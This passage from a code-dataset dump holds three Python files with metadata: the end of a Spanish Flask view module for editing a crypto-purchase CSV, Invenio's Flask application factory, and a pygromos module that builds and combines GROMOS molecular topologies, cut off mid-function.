fe = open(ficheromovimientos, 'r')\n fs = open(ficheronuevo, 'w')\n ix = int(values.get('ix'))\n precioUnitario = float(values['cantidadPagada'])/float(values['cantidadComprada'])\n registro = '{},\"{}\",{},{},{},{},{}\\n'.format(values['fecha'], \n values['concepto'], \n values['monedaComprada'], \n values['cantidadComprada'], \n values['monedaPagada'], \n values['cantidadPagada'], \n precioUnitario)\n contador = 1\n for linea in fe:\n if contador == ix:\n linea = registro\n fs.write(linea)\n contador += 1\n fe.close()\n fs.close()\n remove(ficheromovimientos)\n rename(ficheronuevo, ficheromovimientos)\n \ndef borrar(ix):\n fe = open(ficheromovimientos, 'r')\n fs = open(ficheronuevo, 'w')\n contador = 1\n for linea in fe:\n if contador != ix:\n fs.write(linea)\n contador += 1\n fe.close()\n fs.close()\n remove(ficheromovimientos)\n rename(ficheronuevo, ficheromovimientos)\ndef validar(values):\n errores = []\n if values['fecha'] == '':\n errores.append('Debe informar la fecha')\n \n if values['concepto'] == '':\n errores.append('Debe informar el concepto')\n if values['cantidadComprada'] == '':\n errores.append('Debe informar la cantidad comprada')\n if values['cantidadPagada'] == '':\n errores.append('Debe informar la cantidad pagada') \n if len(errores) == 0:\n return True\n else:\n return errores 
","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"425322317","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Invenio.\n# Copyright (C) 2017-2018 CERN.\n#\n# Invenio is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Flask application factories for Invenio flavours.\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport os\nimport sys\n\nimport pkg_resources\nfrom invenio_base.app import create_app_factory\nfrom invenio_base.wsgi import create_wsgi_factory, wsgi_proxyfix\nfrom invenio_cache import BytecodeCache\nfrom invenio_config import create_config_loader\nfrom jinja2 import ChoiceLoader, FileSystemLoader\n\nfrom .helpers import TrustedHostsMixin\n\nenv_prefix = 'INVENIO'\n\ninvenio_config_loader = create_config_loader(\n config=None, env_prefix=env_prefix\n)\n\ninstance_path = os.getenv(env_prefix + '_INSTANCE_PATH') or \\\n os.path.join(sys.prefix, 'var', 'instance')\n\"\"\"Instance path for Invenio.\n\nDefaults to ``_INSTANCE_PATH`` or if environment variable is not\nset ``/var/instance``.\n\"\"\"\n\nstatic_folder = os.getenv(env_prefix + '_STATIC_FOLDER') or \\\n os.path.join(instance_path, 'static')\n\"\"\"Static folder path.\n\nDefaults to ``_STATIC_FOLDER`` or if environment variable is not\nset ``/var/instance/static``.\n\"\"\"\n\n\ndef config_loader(app, **kwargs_config):\n \"\"\"Configuration loader.\n\n Adds support for loading templates from the Flask application's instance\n folder (``/templates``).\n \"\"\"\n # This is the only place customize the Flask application right after\n # it has been created, but before all extensions etc are loaded.\n local_templates_path = os.path.join(app.instance_path, 'templates')\n if os.path.exists(local_templates_path):\n # Let's customize the template loader to look into packages\n # and application templates folders.\n app.jinja_loader = ChoiceLoader([\n FileSystemLoader(local_templates_path),\n app.jinja_loader,\n ])\n\n app.jinja_options = dict(\n app.jinja_options,\n cache_size=1000,\n bytecode_cache=BytecodeCache(app)\n )\n\n invenio_config_loader(app, **kwargs_config)\n\n\ndef app_class():\n \"\"\"Create Flask application class.\n\n Invenio-Files-REST needs to patch the Werkzeug form parsing in order to\n support streaming large file uploads. 
This is done by subclassing the Flask\n application class.\n \"\"\"\n try:\n pkg_resources.get_distribution('invenio-files-rest')\n from invenio_files_rest.app import Flask as FlaskBase\n except pkg_resources.DistributionNotFound:\n from flask import Flask as FlaskBase\n\n # Add Host header validation via APP_ALLOWED_HOSTS configuration variable.\n class Request(TrustedHostsMixin, FlaskBase.request_class):\n pass\n\n class Flask(FlaskBase):\n request_class = Request\n\n return Flask\n\n\ncreate_api = create_app_factory(\n 'invenio',\n config_loader=config_loader,\n blueprint_entry_points=['invenio_base.api_blueprints'],\n extension_entry_points=['invenio_base.api_apps'],\n converter_entry_points=['invenio_base.api_converters'],\n wsgi_factory=wsgi_proxyfix(),\n instance_path=instance_path,\n app_class=app_class(),\n)\n\"\"\"Flask application factory for Invenio REST API.\"\"\"\n\ncreate_ui = create_app_factory(\n 'invenio',\n config_loader=config_loader,\n blueprint_entry_points=['invenio_base.blueprints'],\n extension_entry_points=['invenio_base.apps'],\n converter_entry_points=['invenio_base.converters'],\n wsgi_factory=wsgi_proxyfix(),\n instance_path=instance_path,\n static_folder=static_folder,\n app_class=app_class(),\n)\n\"\"\"Flask application factory for Invenio UI.\"\"\"\n\ncreate_app = create_app_factory(\n 'invenio',\n config_loader=config_loader,\n blueprint_entry_points=['invenio_base.blueprints'],\n extension_entry_points=['invenio_base.apps'],\n converter_entry_points=['invenio_base.converters'],\n wsgi_factory=wsgi_proxyfix(create_wsgi_factory({'/api': create_api})),\n instance_path=instance_path,\n static_folder=static_folder,\n app_class=app_class(),\n)\n\"\"\"Flask application factory for combined UI + REST API.\n\nREST API is mounted under ``/api``.\n\"\"\"\n","sub_path":"invenio_app/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":4239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"331187705","text":"\"\"\"\nFile: gromos++ topo file functions\nWarnings: this CLASS IS NOT IMPLEMENTED!\nTODO:REWORK\nDescription:\n in this lib, gromos topo file mainpulating functions are gathered\nAuthor: Marc Lehner, Benjamin Ries\n\"\"\"\n\n#imports\nfrom copy import deepcopy\nfrom typing import TypeVar, Union\nimport warnings\nimport math\n\nfrom pygromos.utils import bash as bash\nfrom pygromos.files._basics import _general_gromos_file, parser\nfrom pygromos.files.blocks import topology_blocks as blocks\n\n\nTopType = TypeVar(\"Top\")\n\n\n#functions\ndef make_topolog(input_arg, build, param, seq, solve=\"H2O\"):\n #define python command\n command=\"make_top \"+input_arg+\" \"+param+\" \"+seq+\" \"+solve+\" \\n\"\n\n #execute command\n try:\n bash.execute(command=command)\n except Exception as err:\n bash.increment_error_level(err_prefix=\"Could not make_topology due to: \", old_err=err)\n\n return command\n\ndef combine_topologies():\n raise Exception('not implemented yet!')\n\ndef check_top():\n raise Exception('not implemented yet!')\n\n#file Classes\nclass Top(_general_gromos_file._general_gromos_file):\n gromos_file_ending:str = \"top\"\n\n def __init__(self, in_value:(str or dict or None or TopType), _future_file:bool=False):\n if type(in_value) is str:\n super().__init__(in_value=in_value, _future_file=_future_file)\n elif(in_value == None):\n self.path = \"\"\n self.block_names = {}\n super().__init__(in_value=None)\n\n elif(type(in_value) is __class__):\n raise Exception('not implemented 
yet!')\n else:\n raise Exception('not implemented yet!')\n\n def __add__(self, top:TopType)->TopType:\n return self._add_top(top=top)\n\n def _add_top(self, top:Union[TopType, None], solvFrom1:bool=True, verbose:bool=False)->TopType:\n \"\"\"\n Combines two topologies, like com_top from Gromos++. Parameters are taken from the initial\n topology; missing parameters from the second topology will be added.\n\n Parameters\n ----------\n top : TopType\n second topology to add to the first topology\n solvFrom1 : bool, optional\n should the solvent be taken from the first topology? (else second), by default True\n verbose : bool, optional\n extra print statements, by default False\n\n Returns\n -------\n TopType\n returns a topology made by combining two topologies\n \"\"\"\n # create the return top\n retTop = deepcopy(self)\n if top is None:\n return retTop\n # add solv\n if not solvFrom1:\n if verbose: print(\"taking solvent from second topology\")\n retTop.SOLVENTATOM = top.SOLVENTATOM\n retTop.SOLVENTCONSTR = top.SOLVENTCONSTR\n\n #calculate the shift of atom types of the second topology and add new atomtypes\n atomTypeShift = {}\n if not (hasattr(retTop, \"ATOMTYPENAME\") and len(retTop.ATOMTYPENAME.content)>=2):\n setattr(retTop, \"ATOMTYPENAME\", deepcopy(top.ATOMTYPENAME))\n setattr(retTop, \"LJPARAMETERS\", deepcopy(top.LJPARAMETERS))\n for idx, atomT in enumerate(top.ATOMTYPENAME.content[1:]): #new atomtypes to find names for\n foundAtomType = False\n for mainIdx, mainAtomT in enumerate(retTop.ATOMTYPENAME.content[1:]): #AtomTypes in self to match against\n if atomT == mainAtomT: \n foundAtomType = True\n atomTypeShift.update({idx+1:mainIdx+1})\n break\n if not foundAtomType:\n retTop.ATOMTYPENAME.content[0][0] = str(int(retTop.ATOMTYPENAME.content[0][0]) + 1)\n retTop.ATOMTYPENAME.content.append(atomT)\n atomTypeShift.update({idx+1:retTop.ATOMTYPENAME.content[0][0]})\n ljType = top.get_LJparameter_from_IAC(IAC=idx+1)\n retTop.add_new_LJparameter(C6=float(ljType.C6), C12=float(ljType.C12))\n\n if verbose: print(\"atomTypeShift: \" + str(atomTypeShift))\n\n #add RESNAME\n for resname in top.RESNAME.content[1:]:\n retTop.add_new_resname(resname[0])\n\n #add SOLUTEATOM\n if hasattr(retTop, \"SOLUTEATOM\"):\n atnmShift = retTop.SOLUTEATOM.content[-1].ATNM #Number of atoms found in main top. 
Shift secondary top atoms accordingly\n mresShift = retTop.SOLUTEATOM.content[-1].MRES #Number of molecules found in main top.\n else:\n atnmShift=0\n mresShift=0\n if verbose: print(\"atom number shift: \" + str(atnmShift))\n if verbose: print(\"molecule number shift: \" + str(mresShift))\n\n for atom in top.SOLUTEATOM.content:\n retTop.add_new_soluteatom(ATNM = atnmShift + atom.ATNM,\n MRES = mresShift + atom.MRES,\n PANM = atom.PANM,\n IAC = atomTypeShift[atom.IAC],\n MASS = atom.MASS,\n CG = atom.CG,\n CGC = atom.CGC,\n INE = [str(int(x)+atnmShift) for x in atom.INEvalues],\n INE14 = [str(int(x)+atnmShift) for x in atom.INE14values])\n\n # add bonds and bonds with H\n for bond in top.BOND.content:\n bondType = top.BONDSTRETCHTYPE.content[bond.ICB - 1]\n retTop.add_new_bond(k=bondType.CHB, \n b0=bondType.B0, \n atomI=bond.IB + atnmShift, \n atomJ=bond.JB + atnmShift)\n for bond in top.BONDH.content:\n bondType = top.BONDSTRETCHTYPE.content[bond.ICB - 1]\n retTop.add_new_bond(k=bondType.CHB, \n b0=bondType.B0, \n atomI=bond.IB + atnmShift, \n atomJ=bond.JB + atnmShift,\n includesH=True)\n\n # add angles and angles with H\n for angle in top.BONDANGLE.content:\n angleType = top.BONDANGLEBENDTYPE.content[angle.ICT - 1]\n retTop.add_new_angle(k=angleType.CB, \n kh=angleType.CHB, \n b0=angleType.B0, \n atomI=angle.IT + atnmShift, \n atomJ=angle.JT + atnmShift,\n atomK=angle.KT + atnmShift)\n for angle in top.BONDANGLEH.content:\n angleType = top.BONDANGLEBENDTYPE.content[angle.ICT - 1]\n retTop.add_new_angle(k=angleType.CB, \n kh=angleType.CHB, \n b0=angleType.B0, \n atomI=angle.IT + atnmShift, \n atomJ=angle.JT + atnmShift,\n atomK=angle.KT + atnmShift, includesH=True)\n\n # add diheadrals and diheadrals with H\n for dihdrl in top.DIHEDRAL.content:\n dihdrlType = top.TORSDIHEDRALTYPE.content[dihdrl.ICP - 1]\n retTop.add_new_torsiondihedral(CP=dihdrlType.CP, \n PD=dihdrlType.PD, \n NP=dihdrlType.NP, \n atomI=dihdrl.IP + atnmShift, \n atomJ=dihdrl.JP + atnmShift, \n atomK=dihdrl.KP + atnmShift, \n atomL=dihdrl.LP + atnmShift)\n for dihdrl in top.DIHEDRALH.content:\n dihdrlType = top.TORSDIHEDRALTYPE.content[dihdrl.ICPH - 1]\n retTop.add_new_torsiondihedral(CP=dihdrlType.CP, \n PD=dihdrlType.PD, \n NP=dihdrlType.NP, \n atomI=dihdrl.IPH + atnmShift, \n atomJ=dihdrl.JPH + atnmShift, \n atomK=dihdrl.KPH + atnmShift, \n atomL=dihdrl.LPH + atnmShift,\n includesH=True)\n\n # add impdihedrals with and without H\n for dihdrl in top.IMPDIHEDRAL.content:\n dihdrlType = top.IMPDIHEDRALTYPE.content[dihdrl.ICQ - 1]\n retTop.add_new_impdihedral(CQ=dihdrlType.CQ, \n Q0=dihdrlType.Q0,\n atomI=dihdrl.IQ + atnmShift, \n atomJ=dihdrl.JQ + atnmShift, \n atomK=dihdrl.KQ + atnmShift, \n atomL=dihdrl.LQ + atnmShift)\n for dihdrl in top.IMPDIHEDRALH.content:\n dihdrlType = top.IMPDIHEDRALTYPE.content[dihdrl.ICQH - 1]\n retTop.add_new_torsiondihedral(CQ=dihdrlType.CQ, \n Q0=dihdrlType.Q0, \n atomI=dihdrl.IQH + atnmShift, \n atomJ=dihdrl.JQH + atnmShift, \n atomK=dihdrl.KQH + atnmShift, \n atomL=dihdrl.LQH + atnmShift,\n includesH=True)\n\n # add SOLUTEMOLECULES\n for solmol in top.SOLUTEMOLECULES.content[1:]:\n retTop.add_new_SOLUTEMOLECULES(number=str(int(solmol[0]) + atnmShift))\n\n # add TEMPERATUREGROUPS\n for solmol in top.TEMPERATUREGROUPS.content[1:]:\n retTop.add_new_TEMPERATUREGROUPS(number=str(int(solmol[0]) + atnmShift))\n\n # add PRESSUREGROUPS\n for solmol in top.PRESSUREGROUPS.content[1:]:\n retTop.add_new_PRESSUREGROUPS(number=str(int(solmol[0]) + atnmShift))\n\n return retTop\n\n def read_file(self):\n 
#Read blocks to string\n data = parser.read_general_gromos_file(self._orig_file_path)\n\n #translate the string subblocks\n blocks = {}\n for block_title in data:\n #print(block_title)\n self.add_block(blocktitle=block_title, content=data[block_title])\n blocks.update({block_title: self.__getattribute__(block_title)})\n return blocks\n\n def make_ordered(self, orderList:list=None):\n if orderList:\n self._block_order = orderList\n else:\n self._block_order = [\"TITLE\", \"PHYSICALCONSTANTS\",\"TOPVERSION\",\"ATOMTYPENAME\",\"RESNAME\",\"SOLUTEATOM\",\"BONDSTRETCHTYPE\",\"BONDH\",\"BOND\",\"BONDANGLEBENDTYPE\",\"BONDANGLEH\",\"BONDANGLE\",\"IMPDIHEDRALTYPE\",\"IMPDIHEDRALH\",\"IMPDIHEDRAL\",\"TORSDIHEDRALTYPE\",\"DIHEDRALH\",\"DIHEDRAL\",\"CROSSDIHEDRALH\",\"CROSSDIHEDRAL\",\"LJPARAMETERS\",\"SOLUTEMOLECULES\",\"TEMPERATUREGROUPS\",\"PRESSUREGROUPS\",\"LJEXCEPTIONS\",\"SOLVENTATOM\",\"SOLVENTCONSTR\"]\n\n def get_num_atomtypes(self) -> int:\n if not hasattr(self, \"ATOMTYPENAME\"):\n return 0\n else:\n return int(self.ATOMTYPENAME.content[0][0])\n\n def add_new_atomtype(self, name:str, verbose=False):\n if not hasattr(self, \"ATOMTYPENAME\"):\n defaultContent=['0', 'Dummy']\n self.add_block(blocktitle=\"ATOMTYPENAME\", content=defaultContent, verbose=verbose)\n self.ATOMTYPENAME.content.append([name])\n self.ATOMTYPENAME.content.remove(['Dummy'])\n else:\n if len(self.ATOMTYPENAME.content) < 1:\n self.ATOMTYPENAME.content.append([\"0\"])\n self.ATOMTYPENAME.content.append([name])\n self.ATOMTYPENAME.content[0][0] = str(int(self.ATOMTYPENAME.content[0][0])+1)\n\n def add_new_resname(self, name:str, verbose=False):\n if not hasattr(self, \"RESNAME\"):\n defaultContent=['0', 'Dummy']\n self.add_block(blocktitle=\"RESNAME\", content=defaultContent, verbose=verbose)\n self.RESNAME.content.append([name])\n self.RESNAME.content.remove(['Dummy'])\n else:\n if len(self.RESNAME.content) < 1:\n self.RESNAME.content.append([\"0\"])\n self.RESNAME.content.append([name])\n self.RESNAME.content[0][0] = str(int(self.RESNAME.content[0][0])+1)\n\n def add_new_soluteatom(self, ATNM:int=0, MRES:int=0, PANM:str=\"\", IAC:int=0, MASS:float=0, CG:float=0, CGC:int=0, INE:list=[], INE14:list=[], verbose=False):\n if not hasattr(self, \"SOLUTEATOM\"):\n self.add_block(blocktitle=\"SOLUTEATOM\", content=[], verbose=verbose)\n self.SOLUTEATOM.NRP = 0\n # some auto set methods\n if ATNM == 0:\n ATNM = len(self.SOLUTEATOM.content) + 1\n if MRES == 0:\n if len(self.SOLUTEATOM.content) >= 1:\n MRES = self.SOLUTEATOM.content[-1].MRES + 1\n else:\n MRES = 1\n #create new entry\n entry = blocks.soluteatom_type(ATNM=ATNM, MRES=MRES, PANM=PANM, IAC=IAC, MASS=MASS, CG=CG, CGC=CGC, INE=len(INE), INEvalues=INE, INE14=len(INE14), INE14values=INE14)\n self.SOLUTEATOM.content.append(entry)\n self.SOLUTEATOM.NRP += 1\n\n\n def add_new_bond(self, k:float, b0:float, atomI:int, atomJ:int, includesH:bool = False, verbose=False):\n #check if all classes are ready, if not create\n if not hasattr(self, \"BONDSTRETCHTYPE\"):\n self.add_block(blocktitle=\"BONDSTRETCHTYPE\", content=list(), verbose=verbose)\n if includesH:\n if not hasattr(self, \"BONDH\"):\n self.add_block(blocktitle=\"BONDH\", content=list(), verbose=verbose)\n else:\n if not hasattr(self, \"BOND\"):\n self.add_block(blocktitle=\"BOND\", content=list(), verbose=verbose)\n \n \n # find the bondstretchtype number or create new bondstretchtype\n # TODO: add quartic force (CB)\n bond_type_number = 0\n iterator = 1\n quartic = k/(2*(b0**2))\n newBondStretchType = 
blocks.bondstretchtype_type(CB=quartic, CHB=k, B0=b0)\n for bond_type in self.BONDSTRETCHTYPE.content:\n if bond_type.CHB == newBondStretchType.CHB and bond_type.B0 == newBondStretchType.B0:\n break\n else:\n iterator += 1\n bond_type_number = iterator\n if iterator > len(self.BONDSTRETCHTYPE.content):#bond type was not found -> add new bondtype\n self.BONDSTRETCHTYPE.content.append(newBondStretchType)\n self.BONDSTRETCHTYPE.NBTY += 1\n\n #create new bond TODO: maybe check if already exists. But I will asume smart users\n newBond = blocks.top_bond_type(IB=atomI, JB=atomJ, ICB=bond_type_number)\n\n #check if we are adding a bond to BOND or BONDH\n if includesH:\n self.BONDH.content.append(newBond)\n self.BONDH.NBONH += 1\n else:\n self.BOND.content.append(newBond)\n self.BOND.NBON += 1\n\n def add_new_angle(self, k:float, kh:float, b0:float, atomI:int, atomJ:int, atomK:int, includesH:bool = False, verbose=False):\n #check if all classes are ready, if not create\n if not hasattr(self, \"BONDANGLEBENDTYPE\"):\n self.add_block(blocktitle=\"BONDANGLEBENDTYPE\", content=[], verbose=verbose)\n if includesH:\n if not hasattr(self, \"BONDANGLEH\"):\n self.add_block(blocktitle=\"BONDANGLEH\", content=[], verbose=verbose)\n else:\n if not hasattr(self, \"BONDANGLE\"):\n self.add_block(blocktitle=\"BONDANGLE\", content=[], verbose=verbose)\n \n # find the BONDANGLEBENDTYPE number or create new BONDANGLEBENDTYPE\n # TODO: add harmonic in the angle cosine force (CT)\n angle_type_number = 0\n iterator = 1\n for angle_type in self.BONDANGLEBENDTYPE.content:\n if angle_type.CB == k and angle_type.B0 == b0:\n break\n else:\n iterator += 1\n angle_type_number = iterator\n if iterator > len(self.BONDANGLEBENDTYPE.content):#angle type was not found -> add new bondtype\n newBONDANGLEBENDTYPE = blocks.bondstretchtype_type(CB=k, CHB=kh, B0=b0)\n self.BONDANGLEBENDTYPE.content.append(newBONDANGLEBENDTYPE)\n self.BONDANGLEBENDTYPE.NBTY += 1\n \n #create new angle TODO: maybe check if already exists. 
But I will asume smart users\n newAngle = blocks.bondangle_type(IT=atomI, JT=atomJ, KT=atomK, ICT=angle_type_number)\n #check if we are adding a bond to BONDANGLE or BONDANGLEH\n if includesH:\n self.BONDANGLEH.content.append(newAngle)\n self.BONDANGLEH.NTHEH += 1\n else:\n self.BONDANGLE.content.append(newAngle)\n self.BONDANGLE.NTHE += 1\n\n def add_new_torsiondihedral(self, CP:float, PD:float, NP:int, atomI:int, atomJ:int, atomK:int, atomL:int, includesH:bool = False, verbose=False):\n #check if all classes are ready, if not create\n if not hasattr(self, \"TORSDIHEDRALTYPE\"):\n self.add_block(blocktitle=\"TORSDIHEDRALTYPE\", content=[], verbose=verbose)\n if includesH:\n if not hasattr(self, \"DIHEDRALH\"):\n self.add_block(blocktitle=\"DIHEDRALH\", content=[], verbose=verbose)\n else:\n if not hasattr(self, \"DIHEDRAL\"):\n self.add_block(blocktitle=\"DIHEDRAL\", content=[], verbose=verbose)\n \n # find the TORSDIHEDRALTYPE number or create new TORSDIHEDRALTYPE\n torsion_type_number = 0\n iterator = 1\n for torsion_type in self.TORSDIHEDRALTYPE.content:\n if torsion_type.CP == CP and torsion_type.PD == PD and torsion_type.NP == NP:\n break\n else:\n iterator += 1\n torsion_type_number = iterator #found the torsion\n if iterator > len(self.TORSDIHEDRALTYPE.content):#torsion type was not found -> add new bondtype\n newTORSDIHEDRALTYPE = blocks.torsdihedraltype_type(CP=CP, PD=PD, NP=NP)\n self.TORSDIHEDRALTYPE.content.append(newTORSDIHEDRALTYPE)\n self.TORSDIHEDRALTYPE.NPTY += 1\n \n #check if we are adding a bond to DIHEDRAL or DIHEDRALH\n if includesH:\n self.DIHEDRALH.content.append(blocks.dihedralh_type(IPH=atomI, JPH=atomJ, KPH=atomK, LPH=atomL, ICPH=torsion_type_number))\n self.DIHEDRALH.NPHIH += 1\n else:\n self.DIHEDRAL.content.append(blocks.top_dihedral_type(IP=atomI, JP=atomJ, KP=atomK, LP=atomL, ICP=torsion_type_number))\n self.DIHEDRAL.NPHI += 1\n\n \n def add_new_impdihedral_type(self, CQ:float, Q0:float, verbose=False):\n #check if all classes are ready, if not create\n if not hasattr(self, \"IMPDIHEDRALTYPE\"):\n self.add_block(blocktitle=\"IMPDIHEDRALTYPE\", content=[], verbose=verbose)\n newIMPDIHEDRALTYPE = blocks.impdihedraltype_type(CQ=CQ, Q0=Q0)\n self.IMPDIHEDRALTYPE.content.append(newIMPDIHEDRALTYPE)\n self.IMPDIHEDRALTYPE.NQTY += 1\n\n\n def add_new_impdihedral(self, CQ:float, Q0:float, atomI:int, atomJ:int, atomK:int, atomL:int, includesH:bool = False, verbose=False):\n #check if all classes are ready, if not create\n if not hasattr(self, \"IMPDIHEDRALTYPE\"):\n self.add_block(blocktitle=\"IMPDIHEDRALTYPE\", content=[], verbose=verbose)\n if includesH:\n if not hasattr(self, \"IMPDIHEDRALH\"):\n self.add_block(blocktitle=\"IMPDIHEDRALH\", content=[], verbose=verbose)\n else:\n if not hasattr(self, \"IMPDIHEDRAL\"):\n self.add_block(blocktitle=\"IMPDIHEDRAL\", content=[], verbose=verbose)\n \n # find the IMPDIHEDRALTYPE number or create new IMPDIHEDRALTYPE\n impdihedral_type_number = 1\n iterator = 1\n for imp_type in self.IMPDIHEDRALTYPE.content:\n if imp_type.CQ == CQ and imp_type.Q0 == Q0:\n break\n else:\n iterator += 1\n impdihedral_type_number = iterator #found the torsion\n if iterator > len(self.IMPDIHEDRALTYPE.content):#torsion type was not found -> add new bondtype\n self.add_new_impdihedral_type(CQ=CQ, Q0=Q0)\n \n #check if we are adding a bond to IMPDIHEDRALH or IMPDIHEDRALH\n if includesH:\n self.IMPDIHEDRALH.content.append(blocks.impdihedralh_type(IQH=atomI, JQH=atomJ, KQH=atomK, LQH=atomL, ICQH=impdihedral_type_number))\n self.IMPDIHEDRALH.NQHIH += 
1\n else:\n self.IMPDIHEDRAL.content.append(blocks.impdihedral_type(IQ=atomI, JQ=atomJ, KQ=atomK, LQ=atomL, ICQ=impdihedral_type_number))\n self.IMPDIHEDRAL.NQHI += 1\n\n\n #TODO: add implementation\n def add_new_crossdihedral(self, verbose=False):\n raise NotImplementedError(\"Who needs this???? Could you plox implement it. UwU\")\n\n def add_new_LJparameter(self, C6:float, C12:float, CS6:float=0, CS12:float=0, combination_rule:str=\"geometric\", verbose=False, AddATOMTYPENAME:str=None, lowerBound:float=1e-100):\n if not hasattr(self, \"LJPARAMETERS\"):\n self.add_block(blocktitle=\"LJPARAMETERS\", content=[], verbose=verbose)\n self.LJPARAMETERS.NRATT2 = 0\n #safety\n if C6 < lowerBound:\n C6 = lowerBound\n if C12 < lowerBound:\n C12 = lowerBound\n if CS6 < lowerBound:\n CS6 = lowerBound\n if CS12 < lowerBound:\n CS12 = lowerBound\n # add LJ parameter for all existing combinations\n num=0\n nratt=int((math.sqrt(8*self.LJPARAMETERS.NRATT2+1)-1)/2)\n for i in range(nratt):\n if combination_rule == \"geometric\":\n c6 = math.sqrt(float(C6 * self.LJPARAMETERS.content[num].C6))\n c12 = math.sqrt(float(C12 * self.LJPARAMETERS.content[num].C12))\n cs6 = math.sqrt(float(CS6 * self.LJPARAMETERS.content[num].CS6))\n cs12 = math.sqrt(float(CS12 * self.LJPARAMETERS.content[num].CS12))\n else:\n raise NotImplementedError(\"Error in add_new_LJparameter: desired combination rule not implemented\")\n add = blocks.ljparameters_type(IAC=i+1, JAC=nratt+1, C6=c6, C12=c12, CS12=cs12, CS6=cs6)\n self.LJPARAMETERS.append(add)\n num += i+2\n #add new LJ paramter to self\n add = blocks.ljparameters_type(IAC=nratt+1, JAC=nratt+1, C6=C6, C12=C12, CS12=CS12, CS6=CS6)\n self.LJPARAMETERS.append(add)\n self.LJPARAMETERS.NRATT2 += nratt + 1\n \n if AddATOMTYPENAME != None:\n if not hasattr(self, \"ATOMTYPENAME\"):\n self.add_block(blocktitle=\"ATOMTYPENAME\", content=[], verbose=verbose)\n self.LJPARAMETERS.NRATT = 0\n self.add_new_atomtype(AddATOMTYPENAME)\n if(int(self.ATOMTYPENAME.content[0][0]) != self.LJPARAMETERS.content[-1].IAC):\n raise IndexError(\"Missmatch between number of ATOMTYPNAMEs and LJPARAMETERS\")\n\n\n def find_LJparameterNumber(self, C12:float, C6:float) -> int:\n if not hasattr(self, \"LJPARAMETERS\"):\n return 0\n elif self.LJPARAMETERS.NRATT2 < 1:\n return 0\n else:\n for lj in self.LJPARAMETERS.content:\n if C12 == lj.C12 and C6 == lj.C6:\n return lj.IAC\n return 0 # LJ parameter not found\n\n def get_LJparameter_from_IAC(self, IAC:int):\n if not hasattr(self, \"LJPARAMETERS\"):\n raise Exception(\"no LJPARAMETERS block to search in\")\n if (IAC**2 - 1) > self.LJPARAMETERS.NRATT2:\n raise Exception(\"IAC key is too larger than IACs in LJ block\")\n return self.LJPARAMETERS.content[(IAC**2 -1)]\n\n\n def add_new_atom(self, ATNM:int=0, MRES:int=0, PANM:str='_', IAC:int=1, MASS:float=1.0, CG:int=0, CGC:int=1, INE:list=[], INE14:list=[], verbose=False, C6:float=None, C12:float=None, CS6:float=0, CS12:float=0, IACname:str=None):\n if IACname is None:\n IACname = PANM\n \n # Find IAC and (if needed) add a new LJ Parameter\n if C6 != None or C12 != None: #need to find PANM and IAC\n if hasattr(self, \"LJPARAMETERS\"):\n IAC = self.find_LJparameterNumber(C6=C6, C12=C12)\n if IAC == 0: #IAC not found -> add new LJ parameter\n self.add_new_LJparameter(C6=C6, C12=C12, CS6=CS6, CS12=CS12, verbose=verbose, AddATOMTYPENAME=IACname)\n IAC = self.LJPARAMETERS.content[-1].IAC\n if verbose: print(\"New Atomtype with LJ parameters added. 
IAC found as: \" + str(IAC))\n else:\n self.add_new_LJparameter(C6=C6, C12=C12, CS6=CS6, CS12=CS12, verbose=verbose, AddATOMTYPENAME=IACname)\n IAC = 1\n\n self.add_new_soluteatom(ATNM=ATNM, MRES=MRES, PANM=PANM, IAC=IAC, MASS=MASS, CG=CG, CGC=CGC, INE=INE, INE14=INE14)\n\n def add_new_CONSTRAINT(self, IC:int, JC:int, ICC:float, verbose=False):\n \"\"\"\n adds a CONSTRAINT entry to the topology\n\n Parameters\n ----------\n IC : int\n atom index I\n JC : int\n atom index J\n ICC : float\n constraint length \n verbose : bool, optional\n \"\"\"\n if not hasattr(self, \"CONSTRAINT\"):\n self.add_block(blocktitle=\"CONSTRAINT\", content=[], verbose=verbose)\n self.CONSTRAINT.NCON = 0\n if not hasattr(self, \"BONDSTRETCHTYPE\"):\n self.add_block(blocktitle=\"BONDSTRETCHTYPE\", content=list(), verbose=verbose)\n \n # find the bondstretchtype number or create new bondstretchtype\n bond_type_number = 0\n iterator = 1\n newBondStretchType = blocks.bondstretchtype_type(CB=1, CHB=1, B0=ICC)\n for bond_type in self.BONDSTRETCHTYPE.content:\n if bond_type.B0 == newBondStretchType.B0:\n break\n else:\n iterator += 1\n bond_type_number = iterator\n if iterator > len(self.BONDSTRETCHTYPE.content):#bond type was not found -> add new bondtype\n self.BONDSTRETCHTYPE.content.append(newBondStretchType)\n self.BONDSTRETCHTYPE.NBTY += 1\n self.CONSTRAINT.content.append(blocks.constraint_type(IC=IC, JC=JC, ICC=bond_type_number))\n self.CONSTRAINT.NCON += 1\n\n def add_new_TEMPERATUREGROUPS(self, number:str, verbose=False):\n if not hasattr(self, \"TEMPERATUREGROUPS\"):\n defaultContent=['0', 'Dummy']\n self.add_block(blocktitle=\"TEMPERATUREGROUPS\", content=defaultContent, verbose=verbose)\n self.TEMPERATUREGROUPS.content.append([number])\n self.TEMPERATUREGROUPS.content.remove(['Dummy'])\n else:\n if len(self.TEMPERATUREGROUPS.content) < 1:\n self.TEMPERATUREGROUPS.content.append([\"0\"])\n self.TEMPERATUREGROUPS.content.append([number])\n self.TEMPERATUREGROUPS.content[0][0] = str(int(self.TEMPERATUREGROUPS.content[0][0])+1)\n\n def add_new_SOLUTEMOLECULES(self, number:str, verbose=False):\n if not hasattr(self, \"SOLUTEMOLECULES\"):\n defaultContent=['0', 'Dummy']\n self.add_block(blocktitle=\"SOLUTEMOLECULES\", content=defaultContent, verbose=verbose)\n self.SOLUTEMOLECULES.content.append([number])\n self.SOLUTEMOLECULES.content.remove(['Dummy'])\n else:\n if len(self.SOLUTEMOLECULES.content) < 1:\n self.SOLUTEMOLECULES.content.append([\"0\"])\n self.SOLUTEMOLECULES.content.append([number])\n self.SOLUTEMOLECULES.content[0][0] = str(int(self.SOLUTEMOLECULES.content[0][0])+1)\n\n def add_new_PRESSUREGROUPS(self, number:str, verbose=False):\n if not hasattr(self, \"PRESSUREGROUPS\"):\n defaultContent=['0', 